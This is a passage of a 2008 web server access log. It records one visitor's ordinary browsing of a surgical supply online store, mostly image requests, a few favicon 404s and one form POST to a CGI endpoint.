211.106.136.7 - - [10/Jul/2008:03:12:14 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:14 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:14 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:14 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:14 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:18 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:18 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:21 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:20 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2F9A182F64717900E3C406L+M37+ENG HTTP/1.1" 200 37209 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:28 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F9A182F64717900E3C406L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:28 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F9A182F64717900E3C406L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:29 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F9A182F64717900E3C406L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:29 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F9A182F64717900E3C406L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:29 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F9A182F64717900E3C406L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:29 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F9A182F64717900E3C406L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:29 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F9A182F64717900E3C406L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:29 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F9A182F64717900E3C406L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:29 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F9A182F64717900E3C406L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:29 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F9A182F64717900E3C406L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:29 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F9A182F64717900E3C406L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:29 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F9A182F64717900E3C406L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:29 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F9A182F64717900E3C406L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:29 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F9A182F64717900E3C406L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:30 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F9A182F64717900E3C406L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:30 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F9A182F64717900E3C406L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:31 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F9A182F64717900E3C406L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:32 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:34 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:41 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F9A182E61F12900F72406L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.7 - - [10/Jul/2008:03:12:42 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L2F9A182E61F12900F72406L+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0" 211.106.136.7 -